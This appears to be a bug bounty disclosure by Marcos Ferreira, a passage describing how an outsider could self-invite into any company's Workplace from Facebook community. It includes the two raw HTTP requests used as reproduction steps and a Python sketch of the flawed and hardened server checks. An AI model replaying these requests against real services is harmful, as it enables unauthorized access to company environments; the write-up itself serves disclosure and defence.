Workplace from Facebook | Unauthorized access to companies environment

Description:

Details:

  • After registering a new account in my Workplace and reviewing the Burp Suite history tab, I came across the following request:

Reproduction Steps:

  1. Requesting Activation Code:

     POST /at_work/accounts_send_notification HTTP/1.1
     Host: graph.workplace.com

     identifier=test@gmail.com
     pre_login_flow_type=SIGNUP
     access_token=*****

     POST /at_work/accounts_self_invite HTTP/1.1
     Host: graph.workplace.com

     identifier=test@gmail.com
     nonce=998236
     community_id=86381-----------
     form_data={"name":"Test","password":"Test1234@"}
     access_token=*****

  • nonce: the activation code from the first step.
  • community_id: the target company’s community ID.
  • The attacker needed the target company’s community ID. It could be obtained through brute force or from a former employee of the company.
  • Some days after I received the bounty, I was able to find an endpoint which gives the community_id of any company in Workplace.
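
A server-side check that would close this kind of gap, shown as an added example that is not part of the original write-up and not Facebook's code. It assumes the self-invite endpoint accepted any identifier holding a valid nonce for whichever community_id the request named; the data model, function names, the second e-mail address and community ID 1001 are constructed for illustration.

```python
import hmac

# Constructed sample state; the data model and all names are assumptions.
NONCES = {                       # activation code last sent to each identifier
    "test@gmail.com": "998236",
    "alice@example-corp.test": "445566",
}
COMMUNITIES = {                  # "1001" is a made-up community ID
    "1001": {"domains": {"example-corp.test"},
             "invites": {"contractor@gmail.com"}},
}

def nonce_ok(identifier, nonce):
    """True if nonce is the code that was sent to this identifier."""
    expected = NONCES.get(identifier)
    return expected is not None and hmac.compare_digest(
        expected.encode(), nonce.encode())

def self_invite_vulnerable(identifier, nonce, community_id):
    """Assumed flawed logic: owning *any* mailbox is enough to join the
    community named in the request."""
    return nonce_ok(identifier, nonce) and community_id in COMMUNITIES

def may_join(identifier, community_id):
    """Entitlement check: verified company domain or a pending invite."""
    community = COMMUNITIES.get(community_id)
    if community is None:
        return False
    address = identifier.lower()
    domain = address.rsplit("@", 1)[-1]
    return domain in community["domains"] or address in community["invites"]

def self_invite_hardened(identifier, nonce, community_id):
    """Require proof of mailbox ownership AND entitlement to the community,
    then burn the nonce so it cannot be replayed."""
    if not nonce_ok(identifier, nonce):
        return False
    if not may_join(identifier, community_id):
        return False
    NONCES.pop(identifier, None)
    return True
```

With the entitlement check in place, knowing a community_id no longer matters: the request is rejected unless the verified identifier belongs to that community's domains or pending invites.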

Timeline:

Brazilian 19 years old

Marcos Ferreira
